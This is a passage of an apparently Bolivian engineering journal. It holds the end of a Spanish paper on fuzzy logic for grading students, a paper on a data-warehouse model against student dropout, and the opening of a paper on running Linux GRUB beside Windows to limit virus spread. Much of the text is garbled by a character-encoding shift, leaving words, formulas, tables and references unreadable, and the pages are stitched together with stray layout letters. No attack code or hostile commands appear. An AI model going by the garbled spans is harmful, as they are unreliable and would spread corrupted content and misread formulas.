JLY[HPU KPMÄJ\S[PLZ ILJH\ZL [OL [LHJOLY JHU HZZPNU
notes inaccurate depending on the experience and
sensitivity, because in reality the note is assigned to a
student is a human approach when evaluating tests.
It is important to note that when the teacher evaluates language generally uses words such as excellent,
good, fair, which are totally subjective and ambiguous
and fuzzy logic is appropriate to provide linguistic labels. As seen in Figure 1, we have the universe of discourse [0.100] (used evaluation notes), and you can
see that 0 is not enough, but 40 is less inadequate.
INTRODUCCIÓN
Los subconjuntos borrosos son un acercamiento
entre la precisión de las matemáticas clásicas y la
imprecisión del mundo real con el objetivo de lograr
una mejor comprensión de los procesos mentales
y del conocimiento. Los ordenadores actuales no
pueden pensar y razonar en términos imprecisos,
no cuantitativos, “borrosos”. Esta es la diferencia
con el hombre, que puede comprender la semántica en cualquier comunicación escrita u oral, es
decir puede realizar el análisis, la concreción, la
abstracción o la síntesis.
La matemática clásica maneja el concepto de “conjunto” considerado como una colección de cosas u
VIQL[VZUH[\YHSLZHY[PÄJPHSLZWYLZLU[LZVM\[\YVZ
abstractos o tangibles). Pero la adaptabilidad del
ser humano a su entorno natural y social construye
abstracciones que no necesariamente son conjuntos, sino conjuntos o subconjuntos borrosos (como
los conocimientos populares), conocimientos indeterminados, en las que la transición de membresía
a no membresía es mas gradual que brusca.
:LW\LKLHÄYTHYX\LJHZP[VKHSHS}NPJHKLSYHaVnamiento humano no es la lógica clásica de dos
valores, o incluso de varios valores, sino una lógica
de verdades borrosas, de conjunciones borrosas,
de reglas de deducción borrosas (Kaufmann, 77).
Los fenómenos que se encuentran a diario son imprecisos como una consecuencia natural, que también suceden en los procesos académicos (cognitivos, habilidades, evaluación, almacenamiento, etc.)
que puede estar asociada con su forma, posición,
momento, etc.
Actualmente la evaluación en las materias se basa
en una escala de 1 a 100, algunas veces de manera
“cualitativa” A, B, C, D, E; escalas que de alguna
manera pueden ser arbitrarias. Por ejemplo; cual
será la interpretación lógica que usted daría a las
siguientes preguntas:
‹ ,Z[\KPHU[LZX\LVI[PLULU\UHJHSPÄJHJP}UKL
80%?
‹ ,Z[\KPHU[LZX\LVI[PLULU\UHJHSPÄJHJP}UKL
80%, respecto a los estudiantes que obtienen una nota de 60%?
‹ :P [VKVZ SVZ LZ[\KPHU[LZ KL \U J\YZV VI[PLnen notas de 51% frente a otro estudiante
que tiene 50%?
Las interpretaciones quizá sean de que el estudiante
que obtiene 80% es mejor estudiante o excelente, el
LZ[\KPHU[LX\LVI[PLULLZYLN\SHYVZ\ÄJPLU[LV
de acuerdo a las escalas vigentes en cada institución
y ¿qué del estudiante que obtiene la nota de 50%?
+LSHZJHSPÄJHJPVULZWYVW\LZ[HZJHKHWLYZVUHYLHSPaH
una interpretación diferente de acuerdo a su lógica
WLYZVUHSVLZWVU[mULH,UJVUZLJ\LUJPHSHZJHSPÄJHciones son difusas en cuanto a la capacidad cognitiva habilidades y destrezas de dichos estudiantes.
LÓGICA
Relacionando la ciencia de la informática y la lógica
+LH|V(+LÄULJVTV¸SHJPLUJPHKLSVZWYPUJPWPVZ
de la inferencia formalmente válida”.
Por otro lado la lógica como herramienta de la in]LZ[PNHJP}UJPLU[xÄJH[YH[HKLMVYTHSPaHYSVZHJ[VZ`
signos del ser humano del lenguaje, de los conceptos, oraciones frases y razonamientos.
Existe una variedad de lógicas que tratan de formalizar el punto anteriormente indicado, como ser:
‹ 3}NPJHKLWYVWVZPJPVULZ
‹ 3}NPJH KL WYLKPJHKVZ KL WYPTLY ZLN\UKV
tercer orden.
‹ 3}NPJHTVKHS
‹ 3}NPJHT\S[P]HS\HKH
‹ 3}NPJHKPM\ZHTHZJVUVJPKVJVTVM\aa`SVgic
Interpretación de Proposiciones
Sea el siguiente razonamiento:
Si asiste a clases y realiza los trabajos de investigación entonces aprueba la materia
Formalizando:
p: asiste a clases
q: realiza los trabajos de investigación
r: aprueba la materia.
p, q, r son variables proposicionales
no asiste a clases y
realiza los trabajos entonces
no aprueba la materia
i2v : razonamiento valido
+L 7 $UL_PZ[LUSVZLZ[\KPHU[LZX\LUVHZPZ[LU
a clases y realizan los trabajos pero aprueban la
materia.
P!W=X=Y-"W X Y-
La interpretación de i6 es correcta, porque el resultado es iF
Entonces si:
i0v, i1v, i2v, i3v, i4v, i5v, i6v, i7v
,SYHaVUHTPLU[VKLW X YLZ]mSPKV&
Interpretación General
Todos los estudiantes(as) que estudian aprueban con nota excelente:
£LZLZ[\KPHU[LHX\LLZ[\KPH
,U[VUJLZ£HWY\LIHJVUUV[HL_JLSLU[L
+LÄUPLUKV]HYPHISLZ!
c: estudiantes(as) que estudian
a: aprueban con nota excelente
Y!£LZLZ[\KPHU[LHX\LLZ[\KPH
Z!£HWY\LIHJVUUV[HL_JLSLU[L
Formalizando
P1: c a
P2: r
C: s
Interpretación
Sea el par I = (i,v)
Donde:
v: valores semánticos
i: aplicación de p en v
P!W-X-Y-"W X Y=
no asiste a clases y
no realiza los trabajos entonces
no aprueba la materia
i0v : la interpretación es válida
P!W-X-Y="W X Y=
no asiste a clases y
no realiza los trabajos entonces
aprueba la materia
i1v : ¿Esta interpretación es correcta?
A simple análisis la interpretación del razonamiento podría ser no válido, pero lo es.
P!W-X=Y-"W X Y=
En realidad no se puede concluir s porque r es concreto, es decir, ya esta en a global, entonces en la
lógica de proposiciones no se formaliza este tipo de
razonamiento.
Interpretación de Predicados
La anterior formalización podemos expresarla, mediante la lógica de predicados, que permite representar propiedades y/o relaciones, además puede manejar lo concreto y lo general (variables), es decir, tiene
un mayor poder expresivo que la lógica proposicional.
Formalizando
Todos los estudiantes(as) que estudian aprueban
con nota excelente
P
A
R
A
D
I
G
M
A
43
P
A
£LZLZ[\KPHU[LHX\LLZ[\KPH
,U[VUJLZ£HWY\LIHJVUUV[HL_JLSLU[L
c: estudiantes(as) que estudian
a: aprueban con nota excelente
Y!£LZLZ[\KPHU[LHX\LLZ[\KPH
Z!£HWY\LIHJVUUV[HL_JLSLU[L
Propiedades
A
D
I
G
M
A
44
donde ›A(x) se denomina función característica.
:LHUKVZJVUQ\U[VZ(`)KVUKL( )(ZLW\Lde representar con los elementos de B utilizando la
función ›A(x):
A = {ai }
B = {bi} ó
($bHPIP d
A = {ai , bi }
B = {bi , ci } ó
($bHPIP JP d
N : estudian
H : nota excelente
Sujeto: estudiante(a) (variable)
:\QL[V!£JVUJYL[V
R
›(_$b _ ('_ (
7! _5_ H(x))
Pero pueden existir elementos de B que pueden
pertenecer un poco a A, estar muy cercano a A,
etc. Matemáticamente se puede expresar como
subconjunto borroso:
7!5£
*!/£
Sea la sentencia del anterior razonamiento
B _5_ /_ 5£ /£D
( $bHP HP d
9LHSPaHTVZSHPU[LYWYL[HJP}UWHYHLSLZ[\KPHU[LH£
Es decir se extiende la pertenencia a valores intermedios de 0 y 1.
5£ /£ P1
P2
C
i1
F
F
V
F
F
V
V
i2
F
V
V
F
V
F
V
i3
V
F
F
V
F
F
V
b_ ›( _d _ )
i4
V
V
V
V
V
V
V
KVUKL)LZ\UJVUQ\U[VLU\TLYHISLVUV`›( _
LZLSNYHKVKLTLTIYLZxHKL_LU› V[HTIPtUSSHmado función característica de membresía.
7 7
7 7 *
:L W\LKL KLK\JPY X\L LS LZ[\KPHU[L £ HWY\LIH JVU
nota excelente por la tautología de las interpretaciones.
Pero si bien la lógica de predicados resuelve los
problemas de manera general y los casos particulares, pero su interpretación y su semántica es
binaria, por lo cual el estudiante que estudia no necesariamente aprueba con nota excelente.
Interpretación Difusa
La interpretación de la lógica difusa se basa en posibilidades del rango de [0,1] en los subconjuntos
borrosos representados por el conjunto:
Según Zadeh un subconjunto borroso A de B se
KLÄULJVTV\UJVUQ\U[VKLWHYLZVYKLUHKVZ!
›( [VTHZ\Z]HSVYLZLU\UJVUQ\U[VKLTLTIYLZxH
M.
*HSPÄJHJPVULZ
:LHSHZPN\PLU[LLZJHSHKLJHSPÄJHJPVULZ
A excelente 90 – 100
B muy bueno 80 – 89
C bueno 60 – 79
M = {0, 0.1, ...,1}
Denominados conjunto de membresía.
Con la lógica de predicados, se indico que todos
los estudiantes que estudian aprueban con nota
excelente y la pregunta es cuan excelente son estos estudiantes?
Para indicar que un elemento a es miembro del
conjunto A se simboliza como:
Por ejemplo; los siguientes estudiantes tienen las
ZPN\PLU[LZJHSPÄJHJPVULZ!
H (
También esta membresía se puede simbolizar con
los valores de 0 y 1 como pertenencia y no pertenencia respectivamente:
O = 90
P = 93
Q = 98
R = 100
El grado de membresía es 1 porque todos son excelentes.
Se realiza dos consideraciones:
la nota mínima del curso es 80%
la nota mínima del curso es 85%
Para 80%:
B = {80, 81,..., 100}
M = {0, 0.15, 0.3, 0.50, 0.65, 0.90, 1}
( $ b (93,0.65), (98,0.90), (100,1)}
›( _$_¶
_$ ›( $
_$ ›( $
Según el análisis con una nota media de 80 el estudiante que obtiene la nota de 83 es excelente con
una posibilidad de 15%
Para 85%:
B = {85, 86, 87,..., 100}
M = {0, 0.33, 0.53, 0.86, 1}
( $ b 0.86), (100,1)}
Con una nota mínima de 85, el estudiante que obtiene 80 es considerado excelente con una posibilidad de 6%.
Para la toma de decisiones es fundamental hacer
un análisis de las notas altas respecto a su mínimo.
El estudiante que obtuvo una nota de 93 es excelente con una posibilidad de 65% en el primer caso
y mientras que en el segundo caso solamente es
excelente con una posibilidad de 53%.
Según lo analizado se ve la necesidad de almacenar la información del estudiante que obtuvo la nota
excelente con ambas posibilidades, para lo cual es
necesario un medio de almacenamiento que permita el manejo de dicha información para una buena
toma de decisiones. Las Bases de Datos tradicionales son muy limitadas, no permiten ni almacenar
ni tratar con datos difusos, pero para el almacenaTPLU[V KL JHSPÄJHJPVULZ KPM\ZHZ LZ PTWYLZJPUKPble esta forma de almacenamiento para una mejor
toma de decisiones. Las bases de datos relacionales difusas permiten el manejo de información difusa, considerando las etiquetas lingüísticas sobre
un dominio X (excelente) para un determinado atributo A (93 o 65), cuya distribución de posibilidad de
X\LLSH[YPI\[V[VTLLS]HSVY_ ?LZ(_
CONCLUSIONES
Se puede decir que los resultados de la interpretación difusa depende de los parámetros que se
utiliza para el análisis respectivo, en el ejemplo en
particular se utiliza una interpretación lineal pero
puede existir en algunas materias con notas atípicas, notas dispersas, etc. Que deben utilizar un
modelo de acuerdo a cada comportamiento (triangular, exponencial, etc).
P
A
3VZ YLZ\S[HKVZ KLS HUmSPZPZ KL SHZ JHSPÄJHJPVULZ
cuando son cualitativos son difusas, a pesar de tener una escala cuantitativa, ya que en el ejemplo se
demostró que un estudiante que obtuvo la nota de
86 que no esta en la escala de excelente también
es considerado como estudiante excelente con una
posibilidad de 30% y 6% respectivamente.
R
,SHSTHJLUHTPLU[VTHUPW\SHJP}U`JVUZ\S[HÅL_PISLLZ
necesario para coadyuvar en el mejor análisis e interpretación de las notas obtenidas por los estudiantes.
A
Dudas
Sea las siguientes notas obtenidas en la evaluación
de dos materias X, Y.
Estudiantes
Materia X/nota
O
51 máximo
P
50
Q
49 mínimo
Estudiantes
Materia Y/nota
O
65 máximo
P
60
Q
58
R
50 mínimo
D
I
G
¿El estudiante O es excelente?
¿El estudiante P de la materia X debe reprobar?
Bibliografía
‹ +H[LBase de Datos. McGraw Hill-España.
‹ -LYUmUKLa Fundamentos de Informática.
Alianza editorial – Madrid
‹ /PSLYH14HY[xULa=Redes Neuronales
(Y[PÄJPHSLZ Addison Wesley U.S.A.
‹ 4HY[xU KLS )YxV ) Redes Neuronales y
sistemas difusos, México
‹ 5PSZZVU50U[LSPNLUJPHHY[PÄJPHS, McGraw
Hill-España.
M
A
45
MODELO DATAWAREHOUSE
PARA LA TOMA DE DECISIONES
EN LA REDUCCIÓN DE LA TASA
DE ABANDONO DE ESTUDIANTES
P
A
R
A
D
I
G
M
A
46
Daniel Julio Poppe Villa Romero
Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería
Irpavi (La Paz) Bolivia
Email: [email protected][email protected]
RESUMEN
En este trabajo se presenta el desarrollo e implementación de un modelo Datawarehouse para la
toma de decisiones en la reducción de la tasa de
abandono de estudiantes, tomando un caso de estudio a la Universidad Doxa Bolivia. El modelo presentado es libre de parámetros y utiliza procesos
LZWLJxÄJVZWHYHNLULYHYHSLY[HZ[LTWYHUHZYLZWLJto a los estudiantes, realizando la toma decisiones
de manera oportuna de acuerdo a la información
obtenida. En el artículo se resumen el Datawarehouse, la metodología de desarrollo de un Datawarehouse, herramienta utilizada para el desarrollo,
tasa de abandono y las limitaciones del modelo.
que permitan automatizar las áreas de una organización y de esta manera lograr el cumplimiento de
Z\Z VIQL[P]VZ JVU LS ÄU KL ZLY TmZ JVTWL[P[P]HZ
LÄJPLU[LZ`LÄJHJLZ
Uno de estos avances tecnológicos es el Datawarehouse el cual llega a cumplir un papel muy importante dentro de cada una de las empresas y a la vez
H\TLU[H SH JVUÄHUaH WHYH SH [VTH KL KLJPZPVULZ
para que de esta manera se facilite el trabajo, y a
si de esta manera agilizar el trabajo de las empresas, brindando la ayuda necesaria para minimizar
el tiempo de análisis de la información con mayor
velocidad y precisión.
PROBLEMÁTICA
ABSTRACT
In this work, one presents development and implementationand of a data warehouse model for decision making in reducing the dropout rate of students taking a case study at the University Doxa
Bolivia. The model presented is free of parame[LYZ HUK ZWLJPÄJ WYVJLZZLZ \ZLK [V NLULYH[L LHYly warnings regarding students, performing timely
decisions based on the information obtained. The
article summarizes the data warehouse, the methodology of developing a data warehouse, tool used
for development, dropout rate and the limitations of
the model.
PALABRAS CLAVE
Datawarehouse, Metadatos, SQL, Data Manipula[PVU3HUN\HNL+H[H+LÄUP[PVU3HUN\HNL;VTHKL
Decisiones, Tasa de Abandono.
INTRODUCCIÓN
En la actualidad se puede observar que a nivel mundial existe una gran necesidad de contar con tecnologías adecuadas para realizar diferentes procesos
La detección de alguna necesidad y que a la vez no
pueda ser satisfecha por el tipo de sistemas transaccionales y de gestión que existe y que está funcionando de acuerdo a las expectativas de la Universidad Doxa Bolivia. Se pudo detectar que existe
un factor de mucho interés e importancia que es
el de tener alguna forma de poder detectar estudiantes insatisfechos o estudiantes que por motivos académicos, económicos o personales; deciden ABANDONAR la Universidad y que en muchos
casos podían haber sido tratados a tiempo y otros
solucionados, para lo cual se hara el desarrollo de
un modelo Datawarehouse, siguiendo la Metodología propuesta por el INEI (Instituto Nacional de Estadística e Informática – Perú) para el desarrollo de
un Datawarehouse.
OBJETIVO
En este artículo se propone un modelo Datawarehouse el cual permita tomar decisiones referido a
LZ[\KPHU[LZ X\L WYLZLU[LU KPÄJ\S[HKLZ HJHKtTPcas, personales y económicas con la institución,
para reducir los porcentajes de la tasa de abandono
de estudiantes.
Se desea que la aplicación realice la elaboración
de alertas tempranas la realización de un seguimiento personalizado a los estudiantes para determinar factores de riesgo, como el bajo rendimiento
académico determinado por las notas, la mora por
compromisos económicos y la falta de cumplimiento en la presentación de documentos requisitos
para cursar una carrera universitaria.
La estructura de este trabajo se describe a continuación: inicialmente se muestra un concepto sobre el Datawarehouse y el SQL seguidamente de la
TL[VKVSVNxH WSHU[LHKH WVY LS 05,0 ` WHYH ÄUHSPaHY
con conclusiones y recomendaciones para trabajos
futuros a partir de los resultados obtenidos.
DATAWAREHOUSE
,_PZ[LU KP]LYZHZ KLÄUPJPVULZ KL +H[H^HYLOV\ZL
ZPU LTIHYNV SH KLÄUPJP}U TmZ JVUVJPKH WHYH LS
Datawarehouse, fue propuesta en 1992 por Inmon:
“Un DW es una colección de datos orientados a temas, integrados, no-volátiles y variante en el tiempo, organizados para soportar necesidades empresariales” [INMON, 1992]
Al Datawarehouse también se le puede llamar Bussines Intelligence o Decision Support.
En la Figura 1, podemos ver la representación gráÄJHKLSVX\LLZ\U+H[H^HYLOV\ZL
house el metadato juega un papel fundamental, su
M\UJP}UJVUZPZ[LLUYLJVNLY[VKHZSHZKLÄUPJPVULZ
de la organización y el concepto de los datos en el
almacén de datos, debe contener toda la información concerniente a:
P
Tablas
A
Columnas de tablas
Relaciones entre tablas
Jerarquías y Dimensiones de datos
Entidades y Relaciones [HERNANDEZ, 2010]
SQL
Es un lenguaje de consulta estructurado para el acceso a base de datos relacionales. Por tanto el SQL
nos brinda la posibilidad de realizar consultas con
el objetivo de recuperar información de las bases
de datos de manera sencilla. También es utilizado
para crear y manipular directamente las bases de
datos y crear consultas SQL.
3HZZLU[LUJPHZ:83ZLJSHZPÄJHUZLN‚UZ\ÄUHSPKHK
dando origen a tres ‘lenguajes’ o sublenguajes: El
++3 +H[H +LÄUP[PVU 3HUN\HNL SLUN\HQL KL KLÄUPJP}U KL KH[VZ PUJS\`L }YKLULZ WHYH KLÄUPY TVKPÄJHYVIVYYHYSHZ[HISHZLUSHZX\LZLHSTHJLUHU
los datos; el DCL (Data Control Language), lenguaje
de control de datos, contiene elementos útiles para
trabajar en un entorno multiusuario, en el que es importante la protección de los datos, la seguridad de
las tablas y el establecimiento de restricciones en
el acceso; el DML (Data Manipulation Language),
lenguaje de manipulación de datos, nos permite recuperar los datos almacenados en la base de datos
y permite al usuario actualizar la base de datos añadiendo nuevos datos, suprimiendo datos antiguos o
TVKPÄJHUKVKH[VZWYL]PHTLU[LHSTHJLUHKVZ
METODOLOGÍA DE ELABORACIÓN DE UN DATAWAREHOUSE
Figura 1: Datawarehouse
Uno de los componentes más importantes de la
arquitectura de un almacén de datos son los metaKH[VZ:LKLÄULJVT‚UTLU[LJVTV¸KH[VZHJLYJH
de los datos”, en el sentido de que se trata de datos que describen cuál es la estructura de los datos
que se van a almacenar y cómo se relacionan.
El metadato documenta, entre otras cosas, qué tablas existen en una base de datos, qué columnas
posee cada una de las tablas y qué tipo de datos se
pueden almacenar. En el ámbito de los Dataware-
Fase 1: Organización
Se debe tener en consideración los factores para la
WSHUPÄJHJP}USHZLZ[YH[LNPHZKLKLZHYYVSSVKLKPZLño y de gestión del Datawarehouse.
De esta manera entonces primero debe realizarse
el análisis del sistema actual de la institución donde
se va a desarrollar el proyecto, caracterizando los
diferentes procesos en diagramas de casos de uso,
donde se podrá detallar cada una de las tareas que
tienen los diversos módulos del sistema actual.
3\LNVKLZLKLILOHJLYSHPKLU[PÄJHJP}UKLSHM\LUte donde la institución cuenta con un servidor de
R
A
D
I
G
M
A
47
P
A
R
A
D
I
G
M
Base de Datos donde se encuentra almacenado
toda la información de la institución. Después se
KLILPKLU[PÄJHYU\LZ[YHZOLYYHTPLU[HZH\[PSPaHY"SH
herramienta para la extracción de datos utilizada
fue “Microsoft SQL Server 2000 Developer”, el cual
nos proporciona un mejor ambiente de trabajo y así
mismo se trabajara directamente con archivos de
respaldo de la base de datos de la institución; la herramienta para la transformación y limpieza de los
datos es propia del programa de SQL Server este
posee una herramienta integrada que es el DTS
(Data Transformation Services), el cual nos permite
realizar una transformación y carga de los datos de
una manera más rápida y limpia al Datawarehouse; la herramienta para la creación de los cubos se
utilizara la herramienta “Bussines Intelligence” la
cual tiene compatibilidad con la herramienta SQL
Server, agilizando de esta manera el proceso de la
creación de los nuevos cubos.
de Datos y principalmente se debe tomar en cuenta
[HTIPtUSHJVUÄHIPSPKHKKLSVZKH[VZ
Sobre todo es la construcción propia del ETL para
la extracción, transformación y limpieza de los datos donde gracias a estos se crea la nueva base de
datos del Datawarehouse, con datos pre-analizados, para facilitar de esta manera la construcción
de los cubos.
Luego de haber realizado todos los procedimientos de extracción con el ETL se procede a crear
los cubos, con esto se puede hacer relacion de las
diferentes tablas de la nueva base de datos creada
para el Datawarehouse, formando de esta manera un cubo con diferentes dimensiones y atributos,
como se muestra en la Figura 2.
Finalmente se pasa a realizar el análisis de todos
los requerimientos que presenta la empresa, estos
requerimientos principales se encuentran en la Tabla 1.
Requisito
Requerimientos
R1
Extracción de la información pre analizados según las bases de datos.
R2
Desarrollar un Datawarehouse para
la Universidad Doxa Bolivia.
R3
Almacenamiento de los datos extraídos y pre analizados al Datawarehouse.
Figura 2: Cubos
R4
Crear procedimientos almacénanos
ETL de mantenimiento de actualización diaria de la Base de Datos del
Datawarehouse.
R5
Elaborar reportes que presenten los
datos procesados y ayude a la toma
de decisiones.
Para lograr esta relación primero debe crearse en
la herramienta Bussines Intelligence un modelo relacional el cual puede utilizar un esquema estrella
VJVWVKLUPL]LKVUKLZLWVKYmPKLU[PÄJHYSHZKPmensiones como se muestra en la Figura 3.
R6
El modelo Datawarehouse presentaYH SH PUMVYTHJP}U TLKPHU[L NYmÄJHZ
para su mejor visualización e interpretación del mismo hacia el usuario.
Tabla 1: Requerimientos
A
48
Fase 2: Desarrollo
Se debe tomar en cuenta el alcance del modelo, la
YLK\UKHUJPHKLKH[VZ`LS[PWVKL\Z\HYPVÄUHSSVZ
elementos claves para el desarrollo del modelo es
decir la Arquitectura total del depósito, la Arquitectura del servidor y el Sistemas de Gestión de Base
Figura 3: Modelo Relacional (esquema estrella)
Luego se crea las dimensiones que se tiene en el
modelo relacional con sus diferentes atributos los
cuales serán de utilidad al momento en que se haga
Z\ YLWYLZLU[HJP}U NYmÄJH KLS TPZTV KLIPKV X\L
estos desplegaran la información, y los datos estadísticos de acuerdo a lo que el usuario lo necesite.
Esto se muestra en la Figura 4.
JVZ[V`ILULÄJPVKLSTVKLSV
Todos los costos realizados para el desarrollo del
proyecto en su totalidad, de acuerdo a investigaJPVULZ IPISPVNYmÄJHZ ZVU HWYV_PTHKVZ ` YLZWVUden a las siguientes categorías:
Inversión de Software.
Inversión de Hardware.
Capacitación.
Costos de Desarrollo
Inversión Indirecta
Figura 4: Dimensión
Finalmente se hace la construcción del cubo tomando
en cuenta el modelo relacional creado y los atributos
que se crearon, luego de se realiza el mismo procedimiento las veces que sean necesarias para nuestro
Datawarehosue. Esto se muestra en la Figura 5.
Si bien uno de los propósitos de cualquier sistema
es remplazar al ser humano, la presente propuesta
busca apoyar al ser humano y de responder en el
menor tiempo posible ante cualquier eventualidad
inesperada.
7VYSV[HU[VLULZ[LZLU[PKVSVZILULÄJPVZX\LNLnera el sistema propuesto responden a las siguientes categorías:
)LULÄJPVZ[HUNPISLZ
)LULÄJPVZPU[HUNPISLZ
CONCLUSIONES
Figura 5: Cubo
Fase 3: Implementación
Las Estrategias en la Implementación son las siguientes:
‡+LÄUPYLSTLQVYKPZL|VMxZPJVWHYHLSTVKLSV
de datos.
‡+LÄUPYSVZWYVJLZVZKLL_[YHJJP}UÄS[YV[YHUZformación de información y carga de datos.
‡+LÄUPYSVZWYVJLZVZKLHKTPUPZ[YHJP}UKLSH
información.
‡+LÄUPYSHZMVYTHZKLJVUZ\S[HZHSHPUMVYTHción que se le proporcionará al usuario.
5° Completar el modelo de consulta base, relativo al área seleccionada.
6° Implementar los procesos estratégicos del
área de trabajo.
7° Completar las áreas de interés, en forma similar a lo descrito anteriormente.
Fase 4: Evaluación
En esta fase se realiza la evaluación de rendimiento
de la Inversión, es decir, se realiza las evaluaciones
Se concluye que el Datawarehouse provee dos beULÄJPVZLTWYLZHYPHSLZYLHSLZ!0U[LNYHJP}U`(JJLZV
de datos, es decir, que el Datawarehouse elimina
una gran cantidad de datos inútiles y no deseados, como también el procesamiento desde el ambiente operacional clásico, además de ser un almacenamiento separado y homogéneo donde son
cargados datos transformados provenientes de diferentes bases de datos, la cual se convierte en un
colección integrada de información corporativa la
cual está diseñada para la recuperación y también
el análisis en apoyo a la toma de decisiones.
REFERENCIAS BIBLIOGRÁFICAS
‹ (S[LY:3 +LJPZPVUZ\WWVY[Z`Z[LTZ!J\rrent practice and continuing challenges. Reading, Mass., Addison-Wesley Pub.
‹ /\NV 4LYJHKV 7HI}U Business Intelligence –
Seminarios de Actualizacion, 2009.
‹ 0UZ[P[\[V 5HJPVUHS KL ,Z[HKxZ[PJH L 0UMVYTm[PJH
Lima – Perú, 1997.
‹ 4HU\LSKLSH/LYYHU.HZ[}UQue es un Datawarehouse, 1993.
‹ 7YVM ,SSPV[ Manual para la Construcción de un
Datawarehouse, 1997, Ed. INEI, Lima – Perú.
‹ 9\MV4HY[xU7LKYVTutorial SQL.
‹ >PSSPHT/0UTVU3H+LÄUPJP}UKL\U+H[H^HYLhouse, 1992.
P
A
R
A
D
I
G
M
A
49
APLICACIÓN DE GRUB DE LINUX
SOBRE WINDOWS (Vista, 7 y 8) PARA
EVITAR CONTAGIO Y PROPAGACIÓN DE
VIRUS, UTILIZANDO UN PARADIGMA DE
CONTAGIO DE VIRUS DE INFLUENZA
EN NIÑOS MENORES DE 2 AÑOS
P
A
R
A
D
I
G
M
A
50
Diego Carlos Feraudy Pinto
Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería
Irpavi (La Paz) Bolivia
Email: [email protected][email protected]
RESUMEN
INTRODUCCIÓN
En este trabajo se aplica la utilidad de la función de
Grub de Linux que permitirá instalar una distribución de Linux sobre un sistema operativo preinstalado y funcionando (Wiindows), el cual evitará la
ejecución de distintos tipos de archivos y programas maliciosos que se comportan como virus.
,SILULÄJPVKLLZ[HOLYYHTPLU[HYHKPJHYmLUZ\M\Ucionabilidad, independientemente de la presencia
de un antivirus gratuito, con licencia, de prueba,
legal o ilegal; ya que éste software ejecuta varios tipos de archivos al momento de realizar un escaneo
parcial o total de todos los archivos que se encuentran dentro de una unidad física o una partición del
disco duro, que sea indicada por defecto.
En la actualidad se puede observar que hay un gran
nivel de propagación de virus de virus por medio de
dispositivos móviles y dispositivos extraíbles, esto
se debe a que no utilizan bien el antivirus ni el problema de actualización del Windows defender otra
herramienta para encontrar archivos maliciosos
dentro del Windows, la ventaja de aplicar el Grub
de Linux es adicionar una forma de examinar los
datos que uno tiene en las diferentes particiones
del disco es decir cuando la distribución de Linux
reconoce el los datos dentro de la distribución
encuentra varios tipos de archivos que no se ven
dentro de Windows o los encuentra con diferentes
formatos, la clave está en no utilizar un antivirus, el
cual lo veremos más adelante.
ABSTRACT
PROBLEMÁTICA
This paper applies the utility function of Linux Grub,
that allow install a Linux distribution on preinstalled
and running operating system (Wiindows), which
prevents the execution of various types of malicious
WYVNYHTZHUKÄSLZ[OH[ILOH]LSPRL]PY\ZLZ
La gran propagación y mal uso de antivirus geneYHYHT\JOVZTmZWYVISLTHZKLJVUÄN\YHJP}U`KL
ejecución de varios programas dentro de una maquina debido a la mala utilización del antivirus.
OBJETIVO
;OL ILULÄ[ VM [OPZ [VVS ^PSS IL PU P[Z M\UJ[PVUHSP[`
independently of the presence a free antivirus with
license, try version, legal or illegal; because this sof[^HYL L_LJ\[LZ T\S[PWSL ÄSL [`WLZ ^OLU H WHY[PHS
VYJVTWSL[LZJHUUPUNPZZ[HY[LKMYVT[OVZLÄSLZSVcated within a physical drive or hard disk partition,
[OH[^PSSILZWLJPÄLKI`KLMH\S[
En este artículo se propone la aplicación de Grub de
Linux para evitar que se ejecuten varios tipos de arJOP]VZTHSPJPVZVZWVYTLKPVZKLJVUÄN\YHJP}UWVY
defecto de un antivirus para lo cual se empleara la
aplicación sin necesidad de utilizar un antivirus solo
aplicando la herramienta de Windows defender.
PALABRAS CLAVE
GRUB DE LINUX
Grub, Linux, Virus, Paradigma, Propagación, Con[HNPV0UÅ\LUaH:JHU
.5< .9<) .5< .YHUK <UPÄLK )VV[SVHKLY LZ
un gestor de arranque múltiple, desarrollado por el
proyecto GNU que se usa comúnmente para iniciar
uno, dos o más sistemas operativos instalados en
un mismo equipo.
GRUB fue inicialmente diseñado e implementado
por el programador Erich Stefan Boleyn como parte del trabajo en el arranque del sistema operativo
GNU Hurd desarrollado por la Free Software Foundation. En 1999, Gordon Matzigkeit y Yoshinori
Okuji convirtieron a GRUB en un paquete de sof[^HYLVÄJPHSKLS7YV`LJ[V.5<`HIYPLYVULSKLZHrrollo del mismo al público.
El desarrollo de la versión más moderna, GRUB 2,
se inició con el nombre de PUPA, hoy abandonado. El proyecto PUPA fue apoyado por la organización Information technology Promotion Agency
(IPA) en Japón. PUPA se integró en el desarrollo
de GRUB 2 alrededor del 2002, cuando la versión
0.9x de GRUB fue renombrada a GRUB Legacy.
Desde febrero del año 2008, GRUB 2 todavía sigue en desarrollo, aunque está siendo usado en
las más recientes versiones de distribuciones de
GNU/Linux.
gusanos, con los que el programa malicioso actúa
replicándose a través de las redes.
En cualquiera de los dos casos, el sistema operativo
infectado comienza a sufrir una serie de comportamientos anómalos o no previstos. Dichos comportamientos son los que dan la traza del problema y
tienen que permitir la recuperación del mismo.
Dentro de las contaminaciones más frecuentes por
interacción del usuario están las siguientes:
‹ 4LUZHQLZ X\L LQLJ\[HU H\[VTm[PJHTLU[L
programas (como el programa de correo que
abre directamente un archivo adjunto).
‹ 0UNLUPLYxH ZVJPHS TLUZHQLZ JVTV! ­,QLJ\[L
este programa y gane un premio».
‹ ,U[YHKH KL PUMVYTHJP}U LU KPZJVZ KL V[YVZ
usuarios infectados.
‹ 0UZ[HSHJP}UKLZVM[^HYLX\LW\LKHJVU[LULY
uno o varios programas maliciosos.
‹ <UPKHKLZL_[YHxISLZKLHSTHJLUHTPLU[V<:)
P
A
R
A
IMPLEMENTACIÓN DE GRUB
Instalación del Grub
D
I
ANTIVIRUS
Grub ya funcionando
G
En informática los antivirus son programas cuyo
objetivo es detectar y/o eliminar virus informáticos.
Nacieron durante la década de1980.
Con el transcurso del tiempo, la aparición de sistemas operativos más avanzados e Internet, ha
hecho que los antivirus hayan evolucionado hacia
programas más avanzados que no sólo buscan detectar virus informáticos, sino bloquearlos, desinfectar archivos y prevenir una infección de los mismos, y actualmente ya son capaces de reconocer
otros tipos de malware, como spyware, gusanos,
troyanos, rootkits, etc.
MÉTODOS DE CONTAGIO
Existen dos grandes grupos de propagación: los
virus cuya instalación el usuario en un momento
dado ejecuta o acepta de forma inadvertida, o los
M
Utilización dentro de Windows
A
51
P
A
R
A
D
“Es necesario tener siempre actualizada esta herramienta”
